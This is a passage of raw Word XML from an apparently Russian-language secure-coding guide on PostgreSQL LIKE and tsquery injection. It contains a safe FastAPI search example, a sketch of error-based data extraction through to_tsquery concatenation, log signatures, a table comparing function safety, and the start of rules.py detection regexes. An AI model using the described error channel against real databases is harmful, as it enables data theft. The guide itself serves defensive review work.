        <w:t xml:space="preserve"># Шаблон: validated config + bind для query body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/search")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def search(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", max_length=200),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lang: Literal["english", "russian", "simple"] = Query("english"),</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lang — Literal (whitelist), q — bind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ websearch_to_tsquery('{lang}', :q)</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f-string в lang безопасен потому что lang — Literal whitelist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(query, {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> валидируется FastAPI Literal-проверкой до handler — payload-injection невозможна.</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followed by f-string или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-concat в аргументах. Regex: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery\s*\([^)]*\|\|</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to_tsquery\s*\(\s*f["']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Python f-string).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 || (SELECT ...) || ', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в literal-position; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery(... || :input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat между literal и bind.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Database-логи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syntax error in tsquery: "&lt;long-string&gt;"</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&lt;long-string&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит base64-like / hash-like patterns — extracted данные в error message.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Database-логи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text search configuration "&lt;long-string&gt;" does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant B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HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: query parameters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 критичные signal-tokens.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Application-логи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTTP 500 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tsquery</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configuration does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в response body — direct leak.</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Функция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доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 8.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2007). Error message format </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax error in tsquery: "%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не менялся (verbatim в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Никакие фиксы не закрывают этот класс — error-message-with-input — design feature parser-а.</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via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс error-каналов;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конкретный source error message. Граница: 3.2 — CAST-канал; 3.15.4 — tsquery-канал.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3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — predecessor: syntax-error на operator-парсинге как entry point.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3.15.3 websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — primary mitigation (no syntax errors).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concat в plpgsql-functions создаёт ту же категорию канале.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если concat в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приходит через основной SQL-string (а не только tsquery-input), это эскалирует в полноценный SQL-injection.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5.5 Конфиги PostgreSQL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log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обнаруживает leakage.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error-handler middleware для блокировки leakage.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«Text Search Functions and Operators» /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https://www.postgresql.org/docs/current/functions-textsearch.html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Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (parser source с errmsg format) — https://github.com/postgres/postgres/blob/master/src/backend/utils/adt/tsquery.c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PortSwigger: «Extracting data via verbose error messages» — https://portswigger.net/web-security/sql-injection/cheat-sheet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OWASP: «Improper Error Handling» — https://owasp.org/www-community/Improper_Error_Handling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Django Docs: «Error Reporting» (как настроить error-handler чтоб не leak ORM-error) — https://docs.djangoproject.com/en/6.0/howto/error-reporting/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FastAPI Docs: «Handling Errors» / Custom exception handlers — https://fastapi.tiangolo.com/tutorial/handling-errors/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари: категория 3.15 LIKE / tsquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.15 покрывает injection в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern-семантике</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LIKE wildcards) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">operator-language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tsquery). Четыре подраздела разбирают одну общую идею: bind-параметризация защищает SQL-уровень, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не защищает от семантики самого pattern/operator-языка внутри передаваемой строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это — отдельный класс injection, который нельзя закрыть тем же приёмом, что обычную SQL-инъекцию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный тезис категории: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">escape pattern-символов или переход на функции без operator-parsing — обязательны даже при правильной bind-параметризации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для LIKE — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">escape_like_pattern()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ESCAPE \\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для FTS —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(с PG 11+) вместо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Подразделы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3.15.1 % и _ в LIKE без ESCAPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — wildcards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интерпретируются движком LIKE даже при bind. Auth bypass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info leak через </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-position-matching, DoS через множественные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без trigram-index. Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">escape_like_pattern()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ESCAPE '\\'</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3.15.2 to_tsquery операторы</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&amp; | ! &lt;-&gt; :*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — operators tsquery-языка; user-input в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eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для search-syntax. Boolean override, prefix enumeration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syntax-error info leak. Защита: переход на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3.15.3 websearch_to_tsquery / plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — защитный pattern.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игнорирует все operators.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(PG 11+) поддерживает restricted Google-style syntax без error-channel. Migration с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нулевая API regression.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3.15.4 tsquery как error-based канал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в аргументах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-subquery → leaked extracted value в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: syntax error in tsquery: "..."</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ERROR: text search configuration "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Защита: bind для всех аргументов + Literal/regconfig-cast + error-handler middleware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица: функции tsquery с точки зрения безопасности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Функция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Парсит operators</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Syntax error на bad input</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Поддерживает phrase</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PG-версия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Безопасность для user-input</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to_tsquery(q)</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да, все operators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ERROR + leak input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(через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>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уязвимо</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 3.15.2 + 3.15.4</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plainto_tsquery(q)</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(ignored)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(всегда AND)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безопасно</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phraseto_tsquery(q)</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(ignored)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(всегда phrase)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безопасно</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websearch_to_tsquery(q)</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restricted subset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(gracefully ignored)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 (через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рекомендация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Хук для rules.py: класс PATTERN_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># rules.py фрагмент — детекция pattern/tsquery injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import re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PATTERN_INJECTION_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.15.1: LIKE с bind, без сопровождающего escape-helper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (требует анализа окружения — runtime-helper или AST-walk)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bI?LIKE\s+:\w+", re.IGNORECASE),                       # LIKE :var</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
